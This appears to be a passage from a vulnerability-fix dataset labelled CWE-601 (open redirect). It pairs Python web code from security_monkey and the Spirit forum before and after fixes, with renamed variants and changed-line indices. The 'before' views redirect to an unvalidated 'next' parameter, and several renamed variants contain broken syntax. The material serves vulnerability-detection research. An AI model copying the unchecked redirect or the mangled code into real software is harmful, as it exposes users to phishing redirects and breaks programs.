@app.route("/static/custom.css")
def FUNC_18():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def FUNC_19():
def FUNC_21(VAR_23, VAR_24, VAR_25):
if VAR_23 != "SECRET_KEY":
if type(VAR_24) is dict:
for k, v in VAR_24.items():
FUNC_21(k, v, VAR_25[VAR_23])
else:
VAR_25[VAR_23] = VAR_24
VAR_9 = forms.config_form(app.config)
VAR_26 = vars(Config())
if VAR_9.validate_on_submit():
VAR_37 = Config()
VAR_37.override(VAR_9.data)
for k, v in vars(VAR_37).items():
FUNC_21(k, v, app.config)
write_config(vars(VAR_37)) # save to filesystem FUNC_19
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update FUNC_19.", "error")
return render_template(
"config.html", conf=VAR_9, VAR_26=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from FUNC_16
@app.route("/save_from_bookmarklet", methods=["POST"])
def FUNC_20():
VAR_27 = request.form.get("html")
if not VAR_27:
return "No HTML provided", 400
VAR_28 = DataObj(url=request.form.get("url"), type="bookmark")
VAR_28.process_bookmark_url(VAR_27)
if VAR_28.insert():
return redirect(f"/VAR_13/{VAR_28.id}")
else:
return "Could not save bookmark", 500
| [
5,
19,
26,
28,
29,
35,
39,
40,
51,
52,
62,
75,
76,
77,
98,
101,
104,
105,
123,
126,
127,
135,
136,
145,
153,
160,
161,
169,
173,
176,
184,
185,
190,
193,
194,
196,
201,
217,
218,
239,
240,
250,
251,
260,
265,
268,
272,
273,
279,
280,
297,
298,
309,
310,
323,
324,
341,
342,
346,
347,
358,
359,
368,
369,
375,
383,
390,
399,
400,
406,
420,
372,
373,
374,
404,
405,
406,
407,
408,
409,
410
] | [
5,
19,
26,
28,
29,
35,
39,
40,
51,
52,
62,
75,
76,
77,
98,
101,
104,
105,
123,
126,
127,
135,
136,
145,
153,
160,
161,
169,
173,
176,
184,
185,
190,
193,
194,
196,
201,
217,
218,
239,
240,
250,
251,
260,
265,
271,
275,
276,
282,
283,
300,
301,
312,
313,
326,
327,
344,
345,
349,
350,
361,
362,
371,
372,
378,
386,
393,
402,
403,
409,
423,
375,
376,
377,
407,
408,
409,
410,
411,
412,
413
] |
4CWE-601
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Login==0.2.10',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
'Flask-Security==1.7.4',
'Flask-WTF==0.9.5',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.5.2',
'bcrypt==2.0.0',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.3.2',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
# 'Flask-Security==1.7.4',
'Flask-Security-Fork==1.8.2',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.6.2',
'bcrypt==3.1.2',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.7.1',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
| open_redirect | {
"code": [
" 'Flask-Login==0.2.10',",
" 'Flask-Security==1.7.4',",
" 'Flask-WTF==0.9.5',",
" 'psycopg2==2.5.2',",
" 'bcrypt==2.0.0',",
" 'cryptography==1.3.2',"
],
"line_no": [
26,
33,
34,
40,
41,
44
]
} | {
"code": [
" 'Flask-Security-Fork==1.8.2',",
" 'psycopg2==2.6.2',",
" 'bcrypt==3.1.2',",
" 'cryptography==1.7.1',"
],
"line_no": [
33,
39,
40,
43
]
} |
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Login==0.2.10',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
'Flask-Security==1.7.4',
'Flask-WTF==0.9.5',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.5.2',
'bcrypt==2.0.0',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.3.2',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
|
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
'Flask-Security-Fork==1.8.2',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.6.2',
'bcrypt==3.1.2',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.7.1',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
15,
64
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
15,
32,
63
] |
4CWE-601
| # -*- coding: utf-8 -*-
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
User = get_user_model()
# I wish django would not force its crappy CBV on me
class _CustomPasswordResetView(django_views.PasswordResetView):
template_name = 'spirit/user/auth/password_reset_form.html'
email_template_name = 'spirit/user/auth/password_reset_email.html'
subject_template_name = 'spirit/user/auth/password_reset_subject.txt'
success_url = reverse_lazy('spirit:user:auth:password-reset-done')
form_class = CustomPasswordResetForm
class _CustomPasswordResetConfirmView(django_views.PasswordResetConfirmView):
template_name = 'spirit/user/auth/password_reset_confirm.html'
success_url = reverse_lazy('spirit:user:auth:password-reset-complete')
class _CustomPasswordResetCompleteView(django_views.PasswordResetCompleteView):
template_name = 'spirit/user/auth/password_reset_complete.html'
class _CustomPasswordResetDoneView(django_views.PasswordResetDoneView):
template_name = 'spirit/user/auth/password_reset_done.html'
class _CustomLoginView(django_views.LoginView):
template_name = 'spirit/user/auth/login.html'
# Make views sane again
_login_view = _CustomLoginView.as_view()
_logout_view = django_views.LogoutView.as_view()
_password_reset_view = _CustomPasswordResetView.as_view()
custom_password_reset_confirm = _CustomPasswordResetConfirmView.as_view()
custom_password_reset_complete = _CustomPasswordResetCompleteView.as_view()
custom_password_reset_done = _CustomPasswordResetDoneView.as_view()
@ratelimit(field='username', rate='5/5m')
# TODO: @guest_only
def custom_login(request, **kwargs):
# Currently, Django 1.5 login view does not redirect somewhere if the user is logged in
if request.user.is_authenticated:
return redirect(request.GET.get('next', request.user.st.get_absolute_url()))
if request.method == "POST" and request.is_limited():
return redirect(request.get_full_path())
return _login_view(request, authentication_form=LoginForm, **kwargs)
# TODO: @login_required ?
def custom_logout(request, **kwargs):
if not request.user.is_authenticated:
return redirect(request.GET.get('next', reverse(settings.LOGIN_URL)))
if request.method == 'POST':
return _logout_view(request, **kwargs)
return render(request, 'spirit/user/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def custom_password_reset(request, **kwargs):
if request.method == "POST" and request.is_limited():
return redirect(reverse("spirit:user:auth:password-reset"))
return _password_reset_view(request, **kwargs)
@ratelimit(rate='2/10s')
# TODO: @guest_only
def register(request, registration_form=RegistrationForm):
if request.user.is_authenticated:
return redirect(request.GET.get('next', reverse('spirit:user:update')))
form = registration_form(data=post_data(request))
if (is_post(request) and
not request.is_limited() and
form.is_valid()):
user = form.save()
send_activation_email(request, user)
messages.info(
request, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': form.get_email()})
# TODO: email-less activation
# if not settings.REGISTER_EMAIL_ACTIVATION_REQUIRED:
# login(request, user)
# return redirect(request.GET.get('next', reverse('spirit:user:update')))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/register.html',
context={'form': form})
def registration_activation(request, pk, token):
user = get_object_or_404(User, pk=pk)
activation = UserActivationTokenGenerator()
if activation.is_valid(user, token):
user.st.is_verified = True
user.is_active = True
user.save()
messages.info(request, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
# TODO: @guest_only
def resend_activation_email(request):
if request.user.is_authenticated:
return redirect(request.GET.get('next', reverse('spirit:user:update')))
form = ResendActivationForm(data=post_data(request))
if is_post(request):
if not request.is_limited() and form.is_valid():
user = form.get_user()
send_activation_email(request, user)
# TODO: show if is_valid only
messages.info(
request, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/activation_resend.html',
context={'form': form})
| # -*- coding: utf-8 -*-
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
User = get_user_model()
# I wish django would not force its crappy CBV on me
class _CustomPasswordResetView(django_views.PasswordResetView):
template_name = 'spirit/user/auth/password_reset_form.html'
email_template_name = 'spirit/user/auth/password_reset_email.html'
subject_template_name = 'spirit/user/auth/password_reset_subject.txt'
success_url = reverse_lazy('spirit:user:auth:password-reset-done')
form_class = CustomPasswordResetForm
class _CustomPasswordResetConfirmView(django_views.PasswordResetConfirmView):
template_name = 'spirit/user/auth/password_reset_confirm.html'
success_url = reverse_lazy('spirit:user:auth:password-reset-complete')
class _CustomPasswordResetCompleteView(django_views.PasswordResetCompleteView):
template_name = 'spirit/user/auth/password_reset_complete.html'
class _CustomPasswordResetDoneView(django_views.PasswordResetDoneView):
template_name = 'spirit/user/auth/password_reset_done.html'
class _CustomLoginView(django_views.LoginView):
template_name = 'spirit/user/auth/login.html'
# Make views sane again
_login_view = _CustomLoginView.as_view()
_logout_view = django_views.LogoutView.as_view()
_password_reset_view = _CustomPasswordResetView.as_view()
custom_password_reset_confirm = _CustomPasswordResetConfirmView.as_view()
custom_password_reset_complete = _CustomPasswordResetCompleteView.as_view()
custom_password_reset_done = _CustomPasswordResetDoneView.as_view()
@ratelimit(field='username', rate='5/5m')
# TODO: @guest_only
def custom_login(request, **kwargs):
# Currently, Django 1.5 login view does not redirect somewhere if the user is logged in
if request.user.is_authenticated:
return safe_redirect(
request, 'next', request.user.st.get_absolute_url())
if request.method == "POST" and request.is_limited():
return redirect(request.get_full_path())
return _login_view(request, authentication_form=LoginForm, **kwargs)
# TODO: @login_required ?
def custom_logout(request, **kwargs):
if not request.user.is_authenticated:
return safe_redirect(request, 'next', reverse(settings.LOGIN_URL))
if request.method == 'POST':
return _logout_view(request, **kwargs)
return render(request, 'spirit/user/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def custom_password_reset(request, **kwargs):
if request.method == "POST" and request.is_limited():
return redirect(reverse("spirit:user:auth:password-reset"))
return _password_reset_view(request, **kwargs)
@ratelimit(rate='2/10s')
# TODO: @guest_only
def register(request, registration_form=RegistrationForm):
if request.user.is_authenticated:
return safe_redirect(request, 'next', reverse('spirit:user:update'))
form = registration_form(data=post_data(request))
if (is_post(request) and
not request.is_limited() and
form.is_valid()):
user = form.save()
send_activation_email(request, user)
messages.info(
request, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': form.get_email()})
# TODO: email-less activation
# if not settings.REGISTER_EMAIL_ACTIVATION_REQUIRED:
# login(request, user)
# return safe_redirect(request, 'next', reverse('spirit:user:update'))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/register.html',
context={'form': form})
def registration_activation(request, pk, token):
user = get_object_or_404(User, pk=pk)
activation = UserActivationTokenGenerator()
if activation.is_valid(user, token):
user.st.is_verified = True
user.is_active = True
user.save()
messages.info(request, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
# TODO: @guest_only
def resend_activation_email(request):
if request.user.is_authenticated:
return safe_redirect(request, 'next', reverse('spirit:user:update'))
form = ResendActivationForm(data=post_data(request))
if is_post(request):
if not request.is_limited() and form.is_valid():
user = form.get_user()
send_activation_email(request, user)
# TODO: show if is_valid only
messages.info(
request, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/activation_resend.html',
context={'form': form})
| open_redirect | {
"code": [
" return redirect(request.GET.get('next', request.user.st.get_absolute_url()))",
" return redirect(request.GET.get('next', reverse(settings.LOGIN_URL)))",
" return redirect(request.GET.get('next', reverse('spirit:user:update')))",
" return redirect(request.GET.get('next', reverse('spirit:user:update')))"
],
"line_no": [
65,
76,
96,
138
]
} | {
"code": [
"from spirit.core.utils.http import safe_redirect",
" request, 'next', request.user.st.get_absolute_url())",
" return safe_redirect(request, 'next', reverse(settings.LOGIN_URL))",
" return safe_redirect(request, 'next', reverse('spirit:user:update'))",
" return safe_redirect(request, 'next', reverse('spirit:user:update'))"
],
"line_no": [
12,
67,
78,
98,
140
]
} |
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import .UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
VAR_0 = get_user_model()
class CLASS_0(django_views.PasswordResetView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_form.html'
VAR_13 = 'spirit/VAR_18/auth/password_reset_email.html'
VAR_14 = 'spirit/VAR_18/auth/password_reset_subject.txt'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-done')
VAR_16 = CustomPasswordResetForm
class CLASS_1(django_views.PasswordResetConfirmView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_confirm.html'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-complete')
class CLASS_2(django_views.PasswordResetCompleteView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_complete.html'
class CLASS_3(django_views.PasswordResetDoneView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_done.html'
class CLASS_4(django_views.LoginView):
VAR_12 = 'spirit/VAR_18/auth/login.html'
VAR_1 = CLASS_4.as_view()
VAR_2 = django_views.LogoutView.as_view()
VAR_3 = CLASS_0.as_view()
VAR_4 = CLASS_1.as_view()
VAR_5 = CLASS_2.as_view()
VAR_6 = CLASS_3.as_view()
@ratelimit(field='username', rate='5/5m')
def FUNC_0(VAR_7, **VAR_8):
if VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', VAR_7.user.st.get_absolute_url()))
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(VAR_7.get_full_path())
return VAR_1(VAR_7, authentication_form=LoginForm, **VAR_8)
def FUNC_1(VAR_7, **VAR_8):
if not VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', reverse(settings.LOGIN_URL)))
if VAR_7.method == 'POST':
return VAR_2(VAR_7, **VAR_8)
return render(VAR_7, 'spirit/VAR_18/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def FUNC_2(VAR_7, **VAR_8):
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(reverse("spirit:VAR_18:auth:password-reset"))
return VAR_3(VAR_7, **VAR_8)
@ratelimit(rate='2/10s')
def FUNC_3(VAR_7, VAR_9=RegistrationForm):
if VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', reverse('spirit:VAR_18:update')))
VAR_17 = VAR_9(data=post_data(VAR_7))
if (is_post(VAR_7) and
not VAR_7.is_limited() and
VAR_17.is_valid()):
VAR_18 = VAR_17.save()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': VAR_17.get_email()})
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/FUNC_3.html',
context={'form': VAR_17})
def FUNC_4(VAR_7, VAR_10, VAR_11):
VAR_18 = get_object_or_404(VAR_0, VAR_10=pk)
VAR_19 = UserActivationTokenGenerator()
if VAR_19.is_valid(VAR_18, VAR_11):
VAR_18.st.is_verified = True
VAR_18.is_active = True
VAR_18.save()
messages.info(VAR_7, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
def FUNC_5(VAR_7):
if VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', reverse('spirit:VAR_18:update')))
VAR_17 = ResendActivationForm(data=post_data(VAR_7))
if is_post(VAR_7):
if not VAR_7.is_limited() and VAR_17.is_valid():
VAR_18 = VAR_17.get_user()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/activation_resend.html',
context={'form': VAR_17})
|
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import .UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
VAR_0 = get_user_model()
class CLASS_0(django_views.PasswordResetView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_form.html'
VAR_13 = 'spirit/VAR_18/auth/password_reset_email.html'
VAR_14 = 'spirit/VAR_18/auth/password_reset_subject.txt'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-done')
VAR_16 = CustomPasswordResetForm
class CLASS_1(django_views.PasswordResetConfirmView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_confirm.html'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-complete')
class CLASS_2(django_views.PasswordResetCompleteView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_complete.html'
class CLASS_3(django_views.PasswordResetDoneView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_done.html'
class CLASS_4(django_views.LoginView):
VAR_12 = 'spirit/VAR_18/auth/login.html'
VAR_1 = CLASS_4.as_view()
VAR_2 = django_views.LogoutView.as_view()
VAR_3 = CLASS_0.as_view()
VAR_4 = CLASS_1.as_view()
VAR_5 = CLASS_2.as_view()
VAR_6 = CLASS_3.as_view()
@ratelimit(field='username', rate='5/5m')
def FUNC_0(VAR_7, **VAR_8):
if VAR_7.user.is_authenticated:
return safe_redirect(
VAR_7, 'next', VAR_7.user.st.get_absolute_url())
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(VAR_7.get_full_path())
return VAR_1(VAR_7, authentication_form=LoginForm, **VAR_8)
def FUNC_1(VAR_7, **VAR_8):
if not VAR_7.user.is_authenticated:
return safe_redirect(VAR_7, 'next', reverse(settings.LOGIN_URL))
if VAR_7.method == 'POST':
return VAR_2(VAR_7, **VAR_8)
return render(VAR_7, 'spirit/VAR_18/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def FUNC_2(VAR_7, **VAR_8):
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(reverse("spirit:VAR_18:auth:password-reset"))
return VAR_3(VAR_7, **VAR_8)
@ratelimit(rate='2/10s')
def FUNC_3(VAR_7, VAR_9=RegistrationForm):
if VAR_7.user.is_authenticated:
return safe_redirect(VAR_7, 'next', reverse('spirit:VAR_18:update'))
VAR_17 = VAR_9(data=post_data(VAR_7))
if (is_post(VAR_7) and
not VAR_7.is_limited() and
VAR_17.is_valid()):
VAR_18 = VAR_17.save()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': VAR_17.get_email()})
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/FUNC_3.html',
context={'form': VAR_17})
def FUNC_4(VAR_7, VAR_10, VAR_11):
VAR_18 = get_object_or_404(VAR_0, VAR_10=pk)
VAR_19 = UserActivationTokenGenerator()
if VAR_19.is_valid(VAR_18, VAR_11):
VAR_18.st.is_verified = True
VAR_18.is_active = True
VAR_18.save()
messages.info(VAR_7, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
def FUNC_5(VAR_7):
if VAR_7.user.is_authenticated:
return safe_redirect(VAR_7, 'next', reverse('spirit:VAR_18:update'))
VAR_17 = ResendActivationForm(data=post_data(VAR_7))
if is_post(VAR_7):
if not VAR_7.is_limited() and VAR_17.is_valid():
VAR_18 = VAR_17.get_user()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/activation_resend.html',
context={'form': VAR_17})
| [
1,
2,
10,
21,
23,
24,
25,
32,
33,
37,
38,
41,
42,
45,
46,
49,
50,
51,
58,
59,
61,
63,
66,
69,
71,
72,
73,
77,
80,
82,
83,
88,
90,
91,
93,
97,
108,
109,
110,
111,
112,
113,
119,
120,
124,
130,
132,
133,
135,
139,
145,
146,
156
] | [
1,
2,
10,
22,
24,
25,
26,
33,
34,
38,
39,
42,
43,
46,
47,
50,
51,
52,
59,
60,
62,
64,
68,
71,
73,
74,
75,
79,
82,
84,
85,
90,
92,
93,
95,
99,
110,
111,
112,
113,
114,
115,
121,
122,
126,
132,
134,
135,
137,
141,
147,
148,
158
] |
4CWE-601
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect, get_object_or_404
from ...core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def create(request, comment_id):
comment = get_object_or_404(Comment, pk=comment_id)
form = FlagForm(
user=request.user,
comment=comment,
data=post_data(request))
if is_post(request) and form.is_valid():
form.save()
return redirect(request.POST.get('next', comment.get_absolute_url()))
return render(
request=request,
template_name='spirit/comment/flag/create.html',
context={
'form': form,
'comment': comment})
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def create(request, comment_id):
comment = get_object_or_404(Comment, pk=comment_id)
form = FlagForm(
user=request.user,
comment=comment,
data=post_data(request))
if is_post(request) and form.is_valid():
form.save()
return safe_redirect(request, 'next', comment.get_absolute_url(), method='POST')
return render(
request=request,
template_name='spirit/comment/flag/create.html',
context={
'form': form,
'comment': comment})
| open_redirect | {
"code": [
"from django.shortcuts import render, redirect, get_object_or_404",
"from ...core.utils.views import is_post, post_data",
" return redirect(request.POST.get('next', comment.get_absolute_url()))"
],
"line_no": [
4,
6,
21
]
} | {
"code": [
"from django.shortcuts import render, get_object_or_404",
"from spirit.core.utils.http import safe_redirect",
"from spirit.core.utils.views import is_post, post_data"
],
"line_no": [
4,
6,
7
]
} |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect, get_object_or_404
from ...core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_2 = get_object_or_404(Comment, pk=VAR_1)
VAR_3 = FlagForm(
user=VAR_0.user,
VAR_2=comment,
data=post_data(VAR_0))
if is_post(VAR_0) and VAR_3.is_valid():
VAR_3.save()
return redirect(VAR_0.POST.get('next', VAR_2.get_absolute_url()))
return render(
VAR_0=request,
template_name='spirit/VAR_2/flag/FUNC_0.html',
context={
'form': VAR_3,
'comment': VAR_2})
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from ..models import Comment
from .forms import FlagForm
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_2 = get_object_or_404(Comment, pk=VAR_1)
VAR_3 = FlagForm(
user=VAR_0.user,
VAR_2=comment,
data=post_data(VAR_0))
if is_post(VAR_0) and VAR_3.is_valid():
VAR_3.save()
return safe_redirect(VAR_0, 'next', VAR_2.get_absolute_url(), method='POST')
return render(
VAR_0=request,
template_name='spirit/VAR_2/flag/FUNC_0.html',
context={
'form': VAR_3,
'comment': VAR_2})
| [
1,
2,
5,
9,
10,
18,
22,
29
] | [
1,
2,
5,
10,
11,
19,
23,
30
] |
4CWE-601
| from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g
from tinydb import TinyDB, Query, operations
from archivy.config import BaseHooks, Config
def load_config(path=""):
"""Loads `config.yml` file safely and deserializes it to a python dict."""
path = path or current_app.config["INTERNAL_DIR"]
with (Path(path) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def config_diff(curr_key, curr_val, parent_dict, defaults):
"""
This function diffs the user config with the defaults to only save what is actually different.
Returns 1 if the current element or its nested elements are different and have been preserved.
"""
if type(curr_val) is dict:
# the any call here diffs all nested children of the current dict and returns whether any have modifications
if not any(
[
config_diff(k, v, curr_val, defaults[curr_key])
for k, v in list(curr_val.items())
